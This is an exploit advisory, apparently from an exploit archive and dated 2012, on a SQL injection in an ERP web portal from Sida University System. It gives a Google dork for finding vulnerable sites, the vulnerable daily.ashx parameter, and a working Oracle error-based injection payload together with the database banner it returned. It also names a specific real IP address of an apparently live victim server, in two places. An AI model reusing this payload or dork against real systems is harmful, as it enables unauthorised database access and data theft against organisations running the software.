The ERP (Enterprise Resource Planning) system from Sida University System suffers from a remote SQL injection vulnerability.
6b509c2af3ab4aec42eafe4b2b75733cb59bac0f5a2011aae36c26758ae9fc10
# Exploit Author: Shahram Darvishvand [karaji_kt21] <darvishvand.shahram[at]gmail[dot]com>
# Exploit Title: [erp (Enterprise Resource plannin) SQL Injection Vulnerability ]
# Vendor : sida university system
# Date: [4/May/2012]
# Google Dork: "نرم افزار جامع erp شامل قوانین کپی رایت می باشد و نوع نسخه بتا می باشد"
# Version: [ 1389/09/17 ]
# Tested on: [ASHX .. Application powered by Oracle DBMS]
============================================================
** This Vulnerability Is On version 1389/09/17 **
--------------------------------------------
Exploit : http://[IP Or Domain]/Portal/WUC/daily.ashx?title=
=============================================================
Example : http://[IP Or Domain]/Portal/WUC/daily.ashx?title=
'or%201=utl_inaddr.get_host_address((select%20banner%20from%20v$version%20where%20rownum=1))--
Response :
Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - 64bit
==========================================================
[+] Greetz : Fahime.Saveh , Behrooz_Ice
********************************
For Screen shot 1 :
http://46.225.126.74/Portal/WUC/daily.ashx?title='or%201=utl_inaddr.get_host_address((select%20banner%20from%20v$version%20where%20rownum=1))--
For Screen Shot 2 :
http://46.225.126.74/Portal/WUC/daily.ashx?title='or%201=utl_inaddr.get_host_address((select%20banner%20from%20v$version%20where%20rownum=1))--